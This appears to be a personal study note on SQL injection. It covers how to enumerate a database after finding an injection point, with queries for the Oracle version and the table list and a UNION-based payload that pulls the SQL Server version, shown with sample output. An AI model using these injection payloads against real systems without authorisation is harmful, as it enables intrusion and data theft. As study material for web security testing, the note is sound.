44 lines
1 KiB
Markdown
44 lines
1 KiB
Markdown
|
|
||
|
## Examining the Database
|
||
|
|
||
|
Following initial identification of an SQL injection vulnerability, it is generally useful to obtain
|
||
|
some information about the database itself. This information can often pave the way for further
|
||
|
exploitation.
|
||
|
- Specific syntax depends on the database type
|
||
|
|
||
|
Enumerating Version (Oracle)
|
||
|
```
|
||
|
SELECT * FROM v$version
|
||
|
```
|
||
|
|
||
|
Enumerating Tables
|
||
|
```
|
||
|
SELECT * FROM information_schema.tables
|
||
|
```
|
||
|
|
||
|
|
||
|
## More Examination
|
||
|
|
||
|
Information you need to gather:
|
||
|
- Type of database software
|
||
|
- Version of database software
|
||
|
- Contents of the database (columns and tables)
|
||
|
|
||
|
|
||
|
Querying the Database Type and Version
|
||
|
![[Pasted image 20221210161338.png]]
|
||
|
|
||
|
Example of using a UNION attack:
|
||
|
```
|
||
|
' UNION SELECT @@version--
|
||
|
```
|
||
|
|
||
|
Might return the following version information:
|
||
|
```
|
||
|
Microsoft SQL Server 2016 (SP2) (KB4052908) - 13.0.5026.0 (X64)
|
||
|
Mar 18 2018 09:11:49
|
||
|
Copyright (c) Microsoft Corporation
|
||
|
Standard Edition (64-bit) on Windows Server 2016 Standard 10.0 <X64> (Build
|
||
|
14393: ) (Hypervisor)
|
||
|
```
|